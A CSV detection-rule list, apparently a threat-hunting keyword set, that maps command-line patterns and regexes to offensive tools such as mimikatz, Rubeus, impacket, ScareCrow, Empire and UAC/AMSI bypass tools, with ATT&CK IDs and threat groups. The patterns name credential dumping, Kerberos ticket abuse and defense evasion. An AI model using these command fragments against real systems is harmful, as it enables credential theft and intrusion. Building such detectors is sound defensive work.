*",".{0,1000}\s\-s\sputty\.exe_sig\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","2965" "*' s::l '*",".{0,1000}\'\ss\:\:l\s\'.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","2967" "* s3aclenum.py*",".{0,1000}\ss3aclenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","2969" "* s3enum.py*",".{0,1000}\ss3enum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","2970" "* s4u * /bronzebit*",".{0,1000}\ss4u\s.{0,1000}\s\/bronzebit.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a 
C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2971" "* s4u * /nopac*",".{0,1000}\ss4u\s.{0,1000}\s\/nopac.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2972" "* s4u * /ticket:*",".{0,1000}\ss4u\s.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2973" "* s4u *.kirbi*",".{0,1000}\ss4u\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2974" "* s4u */rc4:* ",".{0,1000}\ss4u\s.{0,1000}\/rc4\:.{0,1000}\s","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2975" "* s7-info.nse*",".{0,1000}\ss7\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2976" "* -sam * -system * -security * LOCAL > *.out*",".{0,1000}\s\-sam\s.{0,1000}\s\-system\s.{0,1000}\s\-security\s.{0,1000}\sLOCAL\s\>\s.{0,1000}\.out.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","2977" "* sam_reset_all_pw(*",".{0,1000}\ssam_reset_all_pw\(.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","2978" "* samba-vuln-cve-2012-1182.nse*",".{0,1000}\ssamba\-vuln\-cve\-2012\-1182\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2979" "* sandman_server.py*",".{0,1000}\ssandman_server\.py.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","2980" "* -SauronEye -Command *",".{0,1000}\s\-SauronEye\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","2981" "* -save-old -dc-ip *",".{0,1000}\s\-save\-old\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2982" "* saycheese.sh*",".{0,1000}\ssaycheese\.sh.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - 
TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","0","N/A","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","2983" "* -sc GetSyscallStub *",".{0,1000}\s\-sc\sGetSyscallStub\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","2985" "* -sc SysWhispers3*",".{0,1000}\s\-sc\sSysWhispers3.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","2986" "* scan * --dc-ip *",".{0,1000}\sscan\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2988" "* scan --github-org*",".{0,1000}\sscan\s\-\-github\-org.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","0","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","2989" "* scan --github-user*",".{0,1000}\sscan\s\-\-github\-user.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds 
secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","0","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","2990" "* -Scan -ScanType 3 -File * -DisableRemediation -Trace -Level 0x10*",".{0,1000}\s\-Scan\s\-ScanType\s3\s\-File\s.{0,1000}\s\-DisableRemediation\s\-Trace\s\-Level\s0x10.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","2991" "* --scan-local-shares * -e *",".{0,1000}\s\-\-scan\-local\-shares\s.{0,1000}\s\-e\s.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","2992" "* Scanning Eventvwr registry! 
..*",".{0,1000}\sScanning\sEventvwr\sregistry!\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2998" "* ScareCrow.go*",".{0,1000}\sScareCrow\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads integration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang 
Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","0","N/A","N/A","10","10","462","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z","2999" "* ScareCrow.go*",".{0,1000}\sScareCrow\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE 
STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","3000" "* --scarecrow-inject *",".{0,1000}\s\-\-scarecrow\-inject\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","3001" "* -SCCMHost * -Outfile *",".{0,1000}\s\-SCCMHost\s.{0,1000}\s\-Outfile\s.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","3002" "* -ScheduledTask -OnIdle *",".{0,1000}\s\-ScheduledTask\s\-OnIdle\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3003" "* scmuacbypass.cpp*",".{0,1000}\sscmuacbypass\.cpp.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","3004" "* scmuacbypass.exe*",".{0,1000}\sscmuacbypass\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","3005" "* --script dns-srv-enum *",".{0,1000}\s\-\-script\sdns\-srv\-enum\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3006" "* --script http-ntlm-info *",".{0,1000}\s\-\-script\shttp\-ntlm\-info\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3007" "* --script smb-enum-shares *",".{0,1000}\s\-\-script\ssmb\-enum\-shares\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3008" "* --script smb-security-mode*smb-enum-shares *",".{0,1000}\s\-\-script\ssmb\-security\-mode.{0,1000}smb\-enum\-shares\s.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","3009" "* --script smb-vuln-*",".{0,1000}\s\-\-script\ssmb\-vuln\-.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","3010" "* --script=http-ntlm-info --script-args=http-ntlm-info.root=*",".{0,1000}\s\-\-script\=http\-ntlm\-info\s\-\-script\-args\=http\-ntlm\-info\.root\=.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","0","N/A","N/A","N/A","4","359","57","2024-06-27T11:10:32Z","2019-10-23T06:02:56Z","3012" "* --script=ldap-search -p *",".{0,1000}\s\-\-script\=ldap\-search\s\-p\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3013" "* --script=realvnc-auth-bypass *",".{0,1000}\s\-\-script\=realvnc\-auth\-bypass\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - 
TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3014" "* --script-args dns-srv-enum.domain=*",".{0,1000}\s\-\-script\-args\sdns\-srv\-enum\.domain\=.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3015" "* -ScriptString * -GetMinimallyObfuscated*",".{0,1000}\s\-ScriptString\s.{0,1000}\s\-GetMinimallyObfuscated.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","3016" "* -ScriptString * -PSAmsiScanner *",".{0,1000}\s\-ScriptString\s.{0,1000}\s\-PSAmsiScanner\s.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","3017" "* --search ""(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))*",".{0,1000}\s\-\-search\s\""\(\&\(objectCategory\=computer\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=524288\)\).{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - 
TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","3018" "* --search ""(&(objectCategory=group)(cn=*Admins*",".{0,1000}\s\-\-search\s\""\(\&\(objectCategory\=group\)\(cn\=.{0,1000}Admins.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","3019" "* --search ""(&(objectCategory=group)(cn=MS SQL Admins)*",".{0,1000}\s\-\-search\s\""\(\&\(objectCategory\=group\)\(cn\=MS\sSQL\sAdmins\).{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","3020" "* --search 